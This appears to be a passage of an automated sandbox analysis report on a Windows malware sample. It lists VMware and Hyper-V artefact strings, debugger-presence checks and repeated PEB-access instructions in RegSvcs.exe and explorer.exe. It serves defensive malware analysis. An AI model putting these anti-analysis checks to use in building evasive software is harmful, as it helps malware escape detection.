Source: mZanCtInfW.exe, 0000000C.00000002.1410807072.0000000001505000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\!
Source: explorer.exe, 0000000A.00000003.2279552039.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}e
Source: explorer.exe, 0000000A.00000000.1326522218.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000I}~"
Source: explorer.exe, 0000000A.00000003.2278460473.0000000009052000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000}io
Source: explorer.exe, 0000000A.00000000.1326522218.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware SATA CD00
Source: explorer.exe, 0000000A.00000000.1326522218.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2551526353.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2279552039.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWystem32\DriverStore\en-US\machine.inf_loc5
Source: explorer.exe, 0000000A.00000002.2545678343.000000000326A000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware20,1
Source: explorer.exe, 0000000A.00000002.2545678343.000000000326A000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware Virtual RAM00000001VMW-4096MBRAM slot #0RAM slot #0
Source: explorer.exe, 0000000A.00000003.2279552039.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMWare
Source: explorer.exe, 0000000A.00000003.2278460473.0000000009052000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000'
Source: explorer.exe, 0000000A.00000003.2281273819.000000000730A000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: War&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: explorer.exe, 0000000A.00000000.1326522218.0000000008F27000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2279552039.0000000008F27000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2551526353.0000000008F27000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWT`
Source: explorer.exe, 0000000A.00000002.2545678343.000000000326A000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware SVGA IIES1371
Source: explorer.exe, 0000000A.00000002.2545678343.000000000326A000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware Virtual RAM
Source: explorer.exe, 0000000A.00000002.2545678343.000000000326A000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
Source: explorer.exe, 0000000A.00000002.2543669261.0000000000C74000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: explorer.exe, 0000000A.00000003.2279552039.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000000A.00000002.2543669261.0000000000C74000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Source: C:\Users\user\Desktop\890983726372673.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\cmstp.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 9_2_00409AA0 rdtsc

9_2_00409AA0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 9_2_0040ACE0 LdrLoadDll,

9_2_0040ACE0

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 13_2_00AC79E1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

13_2_00AC79E1

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0199019F mov eax, dword ptr fs:[00000030h]	9_2_0199019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0199019F mov eax, dword ptr fs:[00000030h]	9_2_0199019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0199019F mov eax, dword ptr fs:[00000030h]	9_2_0199019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0199019F mov eax, dword ptr fs:[00000030h]	9_2_0199019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0190A197 mov eax, dword ptr fs:[00000030h]	9_2_0190A197
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0190A197 mov eax, dword ptr fs:[00000030h]	9_2_0190A197
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0190A197 mov eax, dword ptr fs:[00000030h]	9_2_0190A197
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01950185 mov eax, dword ptr fs:[00000030h]	9_2_01950185
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019CC188 mov eax, dword ptr fs:[00000030h]	9_2_019CC188
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019CC188 mov eax, dword ptr fs:[00000030h]	9_2_019CC188
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019B4180 mov eax, dword ptr fs:[00000030h]	9_2_019B4180
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019B4180 mov eax, dword ptr fs:[00000030h]	9_2_019B4180
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0198E1D0 mov eax, dword ptr fs:[00000030h]	9_2_0198E1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0198E1D0 mov eax, dword ptr fs:[00000030h]	9_2_0198E1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0198E1D0 mov ecx, dword ptr fs:[00000030h]	9_2_0198E1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0198E1D0 mov eax, dword ptr fs:[00000030h]	9_2_0198E1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0198E1D0 mov eax, dword ptr fs:[00000030h]	9_2_0198E1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019D61C3 mov eax, dword ptr fs:[00000030h]	9_2_019D61C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019D61C3 mov eax, dword ptr fs:[00000030h]	9_2_019D61C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019401F8 mov eax, dword ptr fs:[00000030h]	9_2_019401F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019E61E5 mov eax, dword ptr fs:[00000030h]	9_2_019E61E5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019BA118 mov ecx, dword ptr fs:[00000030h]	9_2_019BA118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019BA118 mov eax, dword ptr fs:[00000030h]	9_2_019BA118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019BA118 mov eax, dword ptr fs:[00000030h]	9_2_019BA118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019BA118 mov eax, dword ptr fs:[00000030h]	9_2_019BA118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019D0115 mov eax, dword ptr fs:[00000030h]	9_2_019D0115
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019BE10E mov eax, dword ptr fs:[00000030h]	9_2_019BE10E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019BE10E mov ecx, dword ptr fs:[00000030h]	9_2_019BE10E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019BE10E mov eax, dword ptr fs:[00000030h]	9_2_019BE10E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019BE10E mov eax, dword ptr fs:[00000030h]	9_2_019BE10E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019BE10E mov ecx, dword ptr fs:[00000030h]	9_2_019BE10E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019BE10E mov eax, dword ptr fs:[00000030h]	9_2_019BE10E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019BE10E mov eax, dword ptr fs:[00000030h]	9_2_019BE10E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019BE10E mov ecx, dword ptr fs:[00000030h]	9_2_019BE10E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019BE10E mov eax, dword ptr fs:[00000030h]	9_2_019BE10E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019BE10E mov ecx, dword ptr fs:[00000030h]	9_2_019BE10E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01940124 mov eax, dword ptr fs:[00000030h]	9_2_01940124
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019A8158 mov eax, dword ptr fs:[00000030h]	9_2_019A8158
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01916154 mov eax, dword ptr fs:[00000030h]	9_2_01916154
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01916154 mov eax, dword ptr fs:[00000030h]	9_2_01916154
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0190C156 mov eax, dword ptr fs:[00000030h]	9_2_0190C156
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019A4144 mov eax, dword ptr fs:[00000030h]	9_2_019A4144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019A4144 mov eax, dword ptr fs:[00000030h]	9_2_019A4144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019A4144 mov ecx, dword ptr fs:[00000030h]	9_2_019A4144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019A4144 mov eax, dword ptr fs:[00000030h]	9_2_019A4144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019A4144 mov eax, dword ptr fs:[00000030h]	9_2_019A4144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0191208A mov eax, dword ptr fs:[00000030h]	9_2_0191208A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019D60B8 mov eax, dword ptr fs:[00000030h]	9_2_019D60B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019D60B8 mov ecx, dword ptr fs:[00000030h]	9_2_019D60B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019A80A8 mov eax, dword ptr fs:[00000030h]	9_2_019A80A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019920DE mov eax, dword ptr fs:[00000030h]	9_2_019920DE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0190C0F0 mov eax, dword ptr fs:[00000030h]	9_2_0190C0F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019520F0 mov ecx, dword ptr fs:[00000030h]	9_2_019520F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0190A0E3 mov ecx, dword ptr fs:[00000030h]	9_2_0190A0E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019180E9 mov eax, dword ptr fs:[00000030h]	9_2_019180E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019960E0 mov eax, dword ptr fs:[00000030h]	9_2_019960E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0192E016 mov eax, dword ptr fs:[00000030h]	9_2_0192E016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0192E016 mov eax, dword ptr fs:[00000030h]	9_2_0192E016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0192E016 mov eax, dword ptr fs:[00000030h]	9_2_0192E016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0192E016 mov eax, dword ptr fs:[00000030h]	9_2_0192E016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01994000 mov ecx, dword ptr fs:[00000030h]	9_2_01994000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019B2000 mov eax, dword ptr fs:[00000030h]	9_2_019B2000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019B2000 mov eax, dword ptr fs:[00000030h]	9_2_019B2000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019B2000 mov eax, dword ptr fs:[00000030h]	9_2_019B2000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019B2000 mov eax, dword ptr fs:[00000030h]	9_2_019B2000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019B2000 mov eax, dword ptr fs:[00000030h]	9_2_019B2000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019B2000 mov eax, dword ptr fs:[00000030h]	9_2_019B2000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019B2000 mov eax, dword ptr fs:[00000030h]	9_2_019B2000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019B2000 mov eax, dword ptr fs:[00000030h]	9_2_019B2000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019A6030 mov eax, dword ptr fs:[00000030h]	9_2_019A6030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0190A020 mov eax, dword ptr fs:[00000030h]	9_2_0190A020
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0190C020 mov eax, dword ptr fs:[00000030h]	9_2_0190C020
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01912050 mov eax, dword ptr fs:[00000030h]	9_2_01912050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01996050 mov eax, dword ptr fs:[00000030h]	9_2_01996050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0193C073 mov eax, dword ptr fs:[00000030h]	9_2_0193C073
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01908397 mov eax, dword ptr fs:[00000030h]	9_2_01908397
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01908397 mov eax, dword ptr fs:[00000030h]	9_2_01908397
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01908397 mov eax, dword ptr fs:[00000030h]	9_2_01908397
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0190E388 mov eax, dword ptr fs:[00000030h]	9_2_0190E388
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0190E388 mov eax, dword ptr fs:[00000030h]	9_2_0190E388
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0190E388 mov eax, dword ptr fs:[00000030h]	9_2_0190E388
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0193438F mov eax, dword ptr fs:[00000030h]	9_2_0193438F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0193438F mov eax, dword ptr fs:[00000030h]	9_2_0193438F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019BE3DB mov eax, dword ptr fs:[00000030h]	9_2_019BE3DB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019BE3DB mov eax, dword ptr fs:[00000030h]	9_2_019BE3DB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019BE3DB mov ecx, dword ptr fs:[00000030h]	9_2_019BE3DB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019BE3DB mov eax, dword ptr fs:[00000030h]	9_2_019BE3DB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019B43D4 mov eax, dword ptr fs:[00000030h]	9_2_019B43D4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019B43D4 mov eax, dword ptr fs:[00000030h]	9_2_019B43D4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019CC3CD mov eax, dword ptr fs:[00000030h]	9_2_019CC3CD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0191A3C0 mov eax, dword ptr fs:[00000030h]	9_2_0191A3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0191A3C0 mov eax, dword ptr fs:[00000030h]	9_2_0191A3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0191A3C0 mov eax, dword ptr fs:[00000030h]	9_2_0191A3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0191A3C0 mov eax, dword ptr fs:[00000030h]	9_2_0191A3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0191A3C0 mov eax, dword ptr fs:[00000030h]	9_2_0191A3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0191A3C0 mov eax, dword ptr fs:[00000030h]	9_2_0191A3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019183C0 mov eax, dword ptr fs:[00000030h]	9_2_019183C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019183C0 mov eax, dword ptr fs:[00000030h]	9_2_019183C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019183C0 mov eax, dword ptr fs:[00000030h]	9_2_019183C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019183C0 mov eax, dword ptr fs:[00000030h]	9_2_019183C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019963C0 mov eax, dword ptr fs:[00000030h]	9_2_019963C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0192E3F0 mov eax, dword ptr fs:[00000030h]	9_2_0192E3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0192E3F0 mov eax, dword ptr fs:[00000030h]	9_2_0192E3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0192E3F0 mov eax, dword ptr fs:[00000030h]	9_2_0192E3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019463FF mov eax, dword ptr fs:[00000030h]	9_2_019463FF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019203E9 mov eax, dword ptr fs:[00000030h]	9_2_019203E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019203E9 mov eax, dword ptr fs:[00000030h]	9_2_019203E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019203E9 mov eax, dword ptr fs:[00000030h]	9_2_019203E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019203E9 mov eax, dword ptr fs:[00000030h]	9_2_019203E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019203E9 mov eax, dword ptr fs:[00000030h]	9_2_019203E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019203E9 mov eax, dword ptr fs:[00000030h]	9_2_019203E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019203E9 mov eax, dword ptr fs:[00000030h]	9_2_019203E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019203E9 mov eax, dword ptr fs:[00000030h]	9_2_019203E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0190C310 mov ecx, dword ptr fs:[00000030h]	9_2_0190C310
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01930310 mov ecx, dword ptr fs:[00000030h]	9_2_01930310
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0194A30B mov eax, dword ptr fs:[00000030h]	9_2_0194A30B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0194A30B mov eax, dword ptr fs:[00000030h]	9_2_0194A30B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0194A30B mov eax, dword ptr fs:[00000030h]	9_2_0194A30B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0199035C mov eax, dword ptr fs:[00000030h]	9_2_0199035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0199035C mov eax, dword ptr fs:[00000030h]	9_2_0199035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0199035C mov eax, dword ptr fs:[00000030h]	9_2_0199035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0199035C mov ecx, dword ptr fs:[00000030h]	9_2_0199035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0199035C mov eax, dword ptr fs:[00000030h]	9_2_0199035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0199035C mov eax, dword ptr fs:[00000030h]	9_2_0199035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019B8350 mov ecx, dword ptr fs:[00000030h]	9_2_019B8350
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019DA352 mov eax, dword ptr fs:[00000030h]	9_2_019DA352
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01992349 mov eax, dword ptr fs:[00000030h]	9_2_01992349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01992349 mov eax, dword ptr fs:[00000030h]	9_2_01992349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01992349 mov eax, dword ptr fs:[00000030h]	9_2_01992349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01992349 mov eax, dword ptr fs:[00000030h]	9_2_01992349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01992349 mov eax, dword ptr fs:[00000030h]	9_2_01992349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01992349 mov eax, dword ptr fs:[00000030h]	9_2_01992349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01992349 mov eax, dword ptr fs:[00000030h]	9_2_01992349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01992349 mov eax, dword ptr fs:[00000030h]	9_2_01992349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01992349 mov eax, dword ptr fs:[00000030h]	9_2_01992349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01992349 mov eax, dword ptr fs:[00000030h]	9_2_01992349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01992349 mov eax, dword ptr fs:[00000030h]	9_2_01992349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01992349 mov eax, dword ptr fs:[00000030h]	9_2_01992349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01992349 mov eax, dword ptr fs:[00000030h]	9_2_01992349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01992349 mov eax, dword ptr fs:[00000030h]	9_2_01992349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01992349 mov eax, dword ptr fs:[00000030h]	9_2_01992349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019B437C mov eax, dword ptr fs:[00000030h]	9_2_019B437C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0194E284 mov eax, dword ptr fs:[00000030h]	9_2_0194E284
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0194E284 mov eax, dword ptr fs:[00000030h]	9_2_0194E284
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01990283 mov eax, dword ptr fs:[00000030h]	9_2_01990283
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01990283 mov eax, dword ptr fs:[00000030h]	9_2_01990283
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01990283 mov eax, dword ptr fs:[00000030h]	9_2_01990283
